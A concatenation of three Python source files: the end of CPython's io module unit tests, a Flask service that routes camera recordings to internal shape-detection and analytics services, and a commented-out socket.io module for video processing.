'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
with support.check_warnings(('', DeprecationWarning)):
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except OSError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings.catch_warnings(record=True) as recorded:
open(r, *args, closefd=False, **kwargs)
support.gc_collect()
self.assertEqual(recorded, [])
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.args[2], e.characters_written)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
def test_create_fail(self):
# 'x' mode fails if the file already exists
with self.open(support.TESTFN, 'w'):
pass
self.assertRaises(FileExistsError, self.open, support.TESTFN, 'x')
def test_create_writes(self):
# 'x' mode opens for writing
with self.open(support.TESTFN, 'xb') as f:
f.write(b"spam")
with self.open(support.TESTFN, 'rb') as f:
self.assertEqual(b"spam", f.read())
def test_open_allargs(self):
# there used to be a buffer overflow in the parser for rawmode
self.assertRaises(ValueError, self.open, support.TESTFN, 'rwax+')
class CMiscIOTest(MiscIOTest):
io = io
def test_readinto_buffer_overflow(self):
# Issue #18025
class BadReader(self.io.BufferedIOBase):
def read(self, n=-1):
return b'x' * 10**6
bufio = BadReader()
b = bytearray(2)
self.assertRaises(ValueError, bufio.readinto, b)
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
read_results = []
def _read():
if hasattr(signal, 'pthread_sigmask'):
signal.pthread_sigmask(signal.SIG_BLOCK, [signal.SIGALRM])
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
signal.alarm(1)
try:
self.assertRaises(ZeroDivisionError,
wio.write, item * (support.PIPE_MAX_SIZE // len(item) + 1))
finally:
signal.alarm(0)
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
@support.no_tracing
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = support.PIPE_MAX_SIZE
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except OSError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def load_tests(*args):
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
suite = unittest.TestSuite([unittest.makeSuite(test) for test in tests])
return suite
if __name__ == "__main__":
unittest.main()
|
main.py
|
import os
import logging
import copy
import time
import threading
import json
from os import listdir
from os.path import isfile, join
import requests
from flask import Flask, jsonify
from flask_restful import Resource, Api, reqparse
import influxdb
# setup logging
log_level = os.environ.get('LOG_LEVEL', 'DEBUG')
FORMAT = '%(levelname)s %(message)s'
logging.basicConfig(format=FORMAT, level=getattr(logging, log_level))
log = logging.getLogger()
app = Flask(__name__)
api = Api(app)
shape_request_list_jpg = []
shape_request_list_mp4 = []
deep_analytics_list = []
lock = threading.Lock()
def get_desired_shapes(profile):
'''
Look up the shapes configured in the database that are eligible for hits.
Returns a (min_skip_frame, max_skip_frame, shape_set, confidence_level) tuple.
'''
shape_set = set()
confidence_level = 0.7
min_skip_frame = 5
max_skip_frame = 5
if not profile:
log.info("no analytics profile set")
# Return the same 4-tuple as the normal path so callers can always unpack it.
return min_skip_frame, max_skip_frame, shape_set, confidence_level
url_profile = "http://"+cia+":8000/rest/analytics_profiles/"+profile
url_shape = "http://"+cia+":8000/rest/analytics_shapes"
shape_list_db = []
try:
r = requests.get(url_profile)
if r.status_code == 200:
shape_list_db = r.json()['shapes']
confidence_level = r.json()['confidence_level'] / 100
min_skip_frame = r.json()['min_nbr_video_frames_skipped']
max_skip_frame = r.json()['max_nbr_video_frames_skipped']
except Exception as e:
log.error(str(e))
try:
r = requests.get(url_shape)
if r.status_code == 200:
for rec in r.json():
if rec['id'] in shape_list_db:
shape_set.add(rec['shape'])
except Exception as e:
log.error(str(e))
return min_skip_frame, max_skip_frame, shape_set, confidence_level
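# Illustrative sketch (added for clarity, not part of the original service):
# get_desired_shapes() always returns a 4-tuple, so callers unpack all four
# values before deciding how aggressively to skip frames. The profile id used
# here is a made-up placeholder.
def _example_consume_profile(profile_id="1"):
    min_skip, max_skip, shapes, confidence = get_desired_shapes(profile_id)
    log.debug("profile %s: shapes=%s confidence=%.2f skip=%s..%s",
              profile_id, sorted(shapes), confidence, min_skip, max_skip)
    return shapes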
def handle_deep_analytics():
while True:
time.sleep(0.5)
recording_id = None
lock.acquire()
if len(deep_analytics_list) > 0:
recording_id = deep_analytics_list.pop(0)
lock.release()
if recording_id:
log.info("start_get_deep_data {}".format(recording_id))
data = {}
data['recording_id'] = str(recording_id)
try:
r = requests.post("http://"+cia+":5106/deep_analysis/api/v1.0/get_deep_data", json=data)
# Check the status inside the try block so a failed request cannot leave r unbound.
if r.status_code != 201:
log.error("deep analytics error {}".format(r.status_code))
except Exception as e:
log.error(str(e))
time.sleep(0.5)
def handle_shape_requests_mp4():
while True:
shape_request = None
lock.acquire()
if len(shape_request_list_mp4) > 0:
# take the next analytics request from the queue
shape_request = shape_request_list_mp4.pop(0)
lock.release()
if shape_request:
log.debug("len_of_shape_request_list_mp4 {}".format(len(shape_request_list_mp4)))
min_skip_frames, max_skip_frames, desired_shapes, confidence_level = get_desired_shapes(shape_request['analytics_profile'])
analyse_each_n_frames = min_skip_frames
if len(shape_request_list_mp4) > 5:
analyse_each_n_frames = max_skip_frames
if len(desired_shapes) > 0:
try:
data = {
"file": '/root'+shape_request['file']
}
url = "http://"+cia+":5103/shape/api/v1.0/get_video_metadata"
r = requests.post(url, json=data, timeout=30)
if r.status_code == 201:
video_metadata = r.json()
filename, file_extension = os.path.splitext(shape_request['file'])
file_base = '/root'+filename
data = {
"camera_name": shape_request['camera_name'],
"file": '/root'+shape_request['file'],
"type": shape_request['type'],
"recording_id": shape_request['id'],
"file_base": file_base,
"desired_shapes": json.dumps(list(desired_shapes)),
"confidence_level": confidence_level,
"analyse_each_n_frames": analyse_each_n_frames
}
url = "http://"+cia+":5105/shape/api/v1.0/find_shape"
r = requests.post(url, json=data, timeout=1200)
if r.status_code == 201:
shape_list = r.json()
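# Note added for clarity: the exact schema of shape_list is defined by the
# find_shape service; the loop below only relies on each entry exposing a
# "shape" name and a "snapshot_url", e.g. (hypothetical values)
# {"shape": "person", "snapshot_url": "/snapshots/front_door_0001.jpg"}.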
influxdb.send_analytics_shape_data_to_influx(
cia,
shape_request['camera_name'],
shape_request['epoch'],
shape_list, desired_shapes,
recording_id=shape_request['id'],
asset_type='video',
video_metadata = video_metadata)
for shape_entry in shape_list:
rec = {"camera_name": shape_request['camera_name']}
rec['shape_type'] = shape_entry['shape']
rec['snapshot_url'] = shape_entry['snapshot_url']
rec['time'] = 'tbd'
r = requests.post('http://'+cia+':5107/interworking/api/v1.0/register_detected_shape', json=rec)
if r.status_code != 201:
log.error("register_detected_shape error {}".format(r.status_code))
lock.acquire()
deep_analytics_list.append(shape_request['id'])
lock.release()
else:
log.error("find_shape error code {}".format(r.status_code))
else:
log.error("cannot get video metadata for {}".format(data['file']))
except Exception as e:
log.error("%s", str(e))
else:
log.info("No shapes to be analysed for mp4")
time.sleep(0.5)
class MotionDetected(Resource):
'''
REST API resource for receiving motion-detected triggers from a given camera
'''
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument('camera_name', type = str, required = True, location = 'json')
self.reqparse.add_argument('file', type = str, required = True, location = 'json')
self.reqparse.add_argument('type', type = str, required = True, location = 'json')
self.reqparse.add_argument('epoch', type = str, required = True, location = 'json')
self.reqparse.add_argument('analytics_profile', type = str, required = False, location = 'json')
super(MotionDetected, self).__init__()
def post(self):
'''
Receive motion trigger
'''
args = self.reqparse.parse_args()
log.debug("motion triggered %s", args)
# TBC Report motion detection to interworking
return {}, 201
class RecordingReady(Resource):
'''
REST API resource for receiving recording-ready notifications from a given camera
'''
def __init__(self):
self.reqparse = reqparse.RequestParser()
self.reqparse.add_argument('camera_name', type = str, required = True, location = 'json')
self.reqparse.add_argument('file', type = str, required = False, location = 'json')
self.reqparse.add_argument('type', type = str, required = True, location = 'json')
self.reqparse.add_argument('epoch', type = str, required = True, location = 'json')
self.reqparse.add_argument('analytics_profile', type = str, required = False, location = 'json')
self.reqparse.add_argument('id', type = str, required = False, location = 'json')
super(RecordingReady, self).__init__()
def post(self):
'''
Receive recording ready trigger
'''
args = self.reqparse.parse_args()
log.debug("Receive recording triggered %s", args)
lock.acquire()
shape_request_list_mp4.append(copy.deepcopy(args))
lock.release()
# quick motion check on single image of the motion clip
return {}, 201
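# Client-side sketch (an illustration, not part of this service): a recorder
# process would notify the recording_ready endpoint roughly as below once a
# clip has been written. The camera name, file path and ids are made-up
# values; the port matches the app.run() call at the bottom of this module.
def _example_notify_recording_ready(base_url="http://127.0.0.1:5104"):
    payload = {
        "camera_name": "front_door",
        "file": "/recordings/front_door/clip_0001.mp4",
        "type": "mp4",
        "epoch": str(int(time.time())),
        "analytics_profile": "1",
        "id": "42",
    }
    # The endpoint is registered below as /motion/api/v1.0/recording_ready.
    return requests.post(base_url + "/motion/api/v1.0/recording_ready",
                         json=payload, timeout=10)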
# bind resource for REST API service
api.add_resource(MotionDetected, '/motion/api/v1.0/motion_detected', endpoint = 'motion_detected')
api.add_resource(RecordingReady, '/motion/api/v1.0/recording_ready', endpoint = 'recording_ready')
cia = os.environ.get('CONCIERGE_IP_ADDRESS', '127.0.0.1')
root_dir = os.environ.get('ROOT_DIR', '')
# offload triggers for shape detection to a separate thread
shape_handler_mp4 = threading.Thread(target=handle_shape_requests_mp4, args=())
shape_handler_mp4.start()
deep_analytics = threading.Thread(target=handle_deep_analytics, args=())
deep_analytics.start()
app.run(host="0.0.0.0", port=5104)
|
sockets.py
|
# import logging
#
# from socketio.namespace import BaseNamespace
# from socketio.mixins import RoomsMixin, BroadcastMixin
# from socketio.sdjango import namespace
# import time
# from models import Dataset,Video
# from multiprocessing import Pool
# from threading import Thread
# from enums import Compute_state
# from video_processor.models import ShotsDetection,ECR,VideoShotsResult,VideoFrame
#
# def evaluate(self,shotDetection,video):
# for x in shotDetection:
# x.evaluate(video)
# self.broadcast_event('endEval')
#
# # Prepare videos
# def pre_vids(self,videos,dataset,update,overwrite,overwrite_audio,algos):
# nbstep = len(videos)
# nbdone = 0
# print(self)
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# for video in videos:
# video.prepare_state = Compute_state.IN_PROGRESS
# video.save()
# self.broadcast_event('refresh',{"id":video.id})
# dataset.prepare_video(video,update=update, overwrite_converted=overwrite, overwrite_audio=overwrite_audio)
# self.broadcast_event('refresh',{"id":video.id})
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('end')
#
# # Shot videos, evaluate and take thumbnails
# def shot_vids(self,videos,dataset,update,overwrite,overwrite_audio,algos):
# shots_detection = ShotsDetection()
# shots_detection.save()
# shots_detection.setAlgos(algos)
#
# nbstep = len(videos)
# nbdone = 0
# print(self)
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# for video in videos:
# video.shot_state = Compute_state.IN_PROGRESS
# video.save()
# self.broadcast_event('refresh',{"id":video.id})
#
# shots_detection.detect(video)
# nbdone+=1
#
# if(video.shot_boundaries_ground_truth != []):
# shots_detection.evaluate(video)
# shots_detection.take_thumbnails(video)
# self.broadcast_event('refresh',{"id":video.id})
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('end')
#
# # Create the features
# def feature_vids(self,videos,dataset,update,overwrite,overwrite_audio,algos):
# nbstep = len(videos)
# nbdone = 0
# print(self)
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# for video in videos:
# video.features_state = Compute_state.IN_PROGRESS
# video.save()
# self.broadcast_event('refresh',{"id":video.id})
# dataset.compute_features(video,overwrite)
# self.broadcast_event('refresh',{"id":video.id})
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('end')
#
# # Create the arousal
# def arousal_vids(self,videos,dataset,update,overwrite,overwrite_audio,algos,window_len=1000,wsize=10,wstep=3,crest_intensity_threshold=0.1,beta=8):
# nbstep = len(videos)
# nbdone = 0
# # print(self)
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# for video in videos:
# video.arousal_state = Compute_state.IN_PROGRESS
# video.save()
# self.broadcast_event('refresh',{"id":video.id})
# dataset.model_arousal(video,overwrite,window_len,wsize,wstep,crest_intensity_threshold,beta)
# self.broadcast_event('refresh',{"id":video.id})
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('update arousal',{})
# self.broadcast_event('end')
#
# # Prepare, shot, features and arousal the video
# def all_vids(self,videos,dataset,update,overwrite,overwrite_audio,algos):
# # Prepare shot detection
# shots_detection = ShotsDetection()
# shots_detection.save()
# shots_detection.setAlgos(algos)
#
# dataset.prepare()
# nbvid = len(videos)
# nbstep = nbvid*4
# nbdone = 0
# print(self)
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# for video in videos:
# video.prepare_state = Compute_state.IN_PROGRESS
# video.save()
# self.broadcast_event('refresh',{"id":video.id})
#
# dataset.prepare_video(video,update=update, overwrite_converted=overwrite, overwrite_audio=overwrite_audio)
# self.broadcast_event('refresh',{"id":video.id})
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# video.shot_state = Compute_state.IN_PROGRESS
# video.save()
# shots_detection.detect(video)
# if(video.shot_boundaries_ground_truth != []):
# shots_detection.evaluate(video)
# shots_detection.take_thumbnails(video)
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('refresh',{"id":video.id})
# video.features_state = Compute_state.IN_PROGRESS
# video.save()
#
# dataset.compute_features(video,overwrite)
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('refresh',{"id":video.id})
# video.arousal_state = Compute_state.IN_PROGRESS
# video.save()
#
# dataset.model_arousal(video,overwrite)
# nbdone+=1
# self.broadcast_event('progress bar',{"nbstep":nbstep,"nbdone":nbdone})
# self.broadcast_event('refresh',{"id":video.id})
# self.broadcast_event('end')
#
# @namespace('/videoprocessorsocket')
# class VideoProcessorSocketNamespace(BaseNamespace, RoomsMixin, BroadcastMixin):
# def initialize(self):
# self.logger = logging.getLogger("videoprocessorsocket")
# self.log("Socketio session on videoprocessorsocket started")
#
# def log(self, message):
# self.logger.info("[{0}] {1}".format(self.socket.sessid, message))
#
# # def on_shot_dataset(self,params):
# #
# # algos = params['algos']
# # name = params['name']
# # base_path = params['base_path']
# # videos = []
# #
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# # for video in dataset.videos.all():
# # videos.append(video)
# # t = Thread(target=shot_vids,args=(self,videos,dataset,algos))
# # t.start()
# # self.log(params)
# # return True
# #
# #
# # def on_shot_video(self,params):
# # self.log(params)
# # algos = params['algos']
# #
# # for x in algos:
# # self.log(x['key'])
# # self.log(x['value'])
# # videos = []
# # video = Video.objects.get(id=params['id'])
# # name = params['name']
# # base_path = params['base_path']
# # dataset = Dataset.objects.get(name=name, base_path=base_path)
# # videos.append(video)
# # t = Thread(target=shot_vids,args=(self,videos,dataset,algos))
# # t.start()
# # self.log(params)
# # return True
# #
# def on_evaluate_video(self,params):
# video = params['video']
# video = Video.objects.get(id=video['id'])
# res = VideoShotsResult.objects.filter(video=video)
# shots = []
# for x in res:
# shots.append(x.shots_detection)
# t = Thread(target=evaluate ,args=(self,shots,video))
# t.start()
# return True
#
# @namespace('/datasetsocket')
# class DatasetNamespace(BaseNamespace, RoomsMixin, BroadcastMixin):
# def initialize(self):
# self.logger = logging.getLogger("datasetsocket")
